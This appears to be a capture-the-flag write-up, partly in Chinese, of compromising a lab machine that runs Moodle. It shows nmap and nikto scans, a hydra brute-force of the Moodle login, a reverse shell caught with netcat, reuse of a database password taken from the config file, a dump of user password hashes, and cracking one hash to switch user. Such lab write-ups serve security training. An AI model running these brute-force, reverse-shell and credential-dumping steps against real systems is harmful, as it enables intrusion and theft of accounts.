λ nmap -sV -A -Pn -T4 10.10.10.153 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 13:08 ?D1ú±ê×?ê±?? Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 56.13% done; ETC: 13:08 (0:00:04 remaining) Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute Traceroute Timing: About 32.26% done; ETC: 13:08 (0:00:00 remaining) Nmap scan report for 10.10.10.153 Host is up (0.23s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blackhat highschool No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=3/22%OT=80%CT=1%CU=39891%PV=Y%DS=2%DC=T%G=Y%TM=5E76F2E OS:3%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8 OS:)SEQ(CI=I%II=I)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54D OS:ST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W OS:5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y% OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE OS:(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 110/tcp) HOP RTT ADDRESS 1 230.00 ms 10.10.14.1 2 232.00 ms 10.10.10.153
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 41.73 seconds
$ hydra -I -l giovanni -P pwd.txt 10.10.10.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-22 04:23:47 [DATA] max 16 tasks per 1 server, overall 16 tasks, 128 login tries (l:1/p:128), ~8 tries per task [DATA] attacking http-post-form://10.10.10.153:80/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie [80][http-post-form] host: 10.10.10.153 login: giovanni password: Th4C00lTheacha# 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-22 04:23:58
$ nikto -host http://10.10.10.153/moodle - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.153 + Target Hostname: 10.10.10.153 + Target Port: 80 + Start Time: 2020-03-22 02:49:41 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.25 (Debian) + Cookie MoodleSession created without the httponly flag + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'content-script-type' found, with contents: text/javascript + Uncommon header 'content-style-type' found, with contents: text/css + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. + /moodle/config.php: PHP Config file may contain database IDs and passwords. + Uncommon header 'x-accel-buffering' found, with contents: no + OSVDB-3092: /moodle/auth/: This might be interesting... + OSVDB-3268: /moodle/backup/: Directory indexing found. + OSVDB-3092: /moodle/backup/: This might be interesting... + OSVDB-3268: /moodle/install/: Directory indexing found. + OSVDB-3092: /moodle/install/: This might be interesting... + OSVDB-3092: /moodle/lib/: This might be interesting... + OSVDB-3092: /moodle/login/: This might be interesting... + OSVDB-3268: /moodle/pix/: Directory indexing found. + OSVDB-3092: /moodle/pix/: This might be interesting... + OSVDB-3092: /moodle/INSTALL.txt: Default file found. + OSVDB-3268: /moodle/repository/: Directory indexing found. + /moodle/repository/: CRX WebDAV upload + /moodle/composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ + /moodle/composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ + /moodle/package.json: Node.js package file found. It may contain sensitive information. + 7871 requests: 0 error(s) and 26 item(s) reported on remote host + End Time: 2020-03-22 03:27:50 (GMT-4) (2289 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
[>] You should receive a reverse shell attempt from the target at 10.10.16.89 on port 4444 [>] If connection was successful this program will wait here until you close the connection. [>] You should be able to Ctrl+C and retain the connection through netcat.
本机监听4444端口
1
$ nc -lvvp 4444 listening on [any] 4444 ... 10.10.10.153: inverse host lookup failed: Unknown host connect to [10.10.16.89] from (UNKNOWN) [10.10.10.153] 42232 /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")' [email protected]:/var/www/html/moodle/question$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data)
// There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems!
这里列出了MySQL数据库的登录用户名和密码:root和Welkom1!
1 2 3 4 5 6 7 8 9 10 11 12 13
[email protected]:/var/www/moodledata$ mysql -u root -p mysql -u root -p Enter password: Welkom1! Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 949 Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1 Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. ...... MariaDB [moodle]> select username, password from mdl_user; select username, password from mdl_user; +-------------+--------------------------------------------------------------+ | username | password | +-------------+--------------------------------------------------------------+ | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovannibak | 7a860966115182402ed06375cf0a22af | +-------------+--------------------------------------------------------------+ 4 rows in set (0.00 sec)
Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
7a860966115182402ed06375cf0a22afmd5解密
1 2 3 4 5 6 7 8 9 10
[email protected]:/var/www/moodledata$ su giovanni su giovanni Password: expelled
[email protected]:/var/www/moodledata$ id id uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni) [email protected]:/var/www/moodledata$ ls /home/giovanni/ ls /home/giovanni/ user.txt work
[email protected]:~/work$ ls -lR ls -lR .: total 8 drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp
./courses: total 4 drwxr-xr-x 2 root root 4096 Jun 27 2018 algebra
./courses/algebra: total 4 -rw-r--r-- 1 giovanni giovanni 109 Jun 27 2018 answersAlgebra
./tmp: total 8 -rwxrwxrwx 1 root root 256 Mar 22 16:08 backup_courses.tar.gz drwxrwxrwx 3 root root 4096 Jun 27 2018 courses
./tmp/courses: total 4 drwxrwxrwx 2 root root 4096 Jun 27 2018 algebra
./tmp/courses/algebra: total 4 -rwxrwxrwx 1 giovanni giovanni 109 Jun 27 2018 answersAlgebra [email protected]:~/work$ date date Sun Mar 22 16:08:17 CET 2020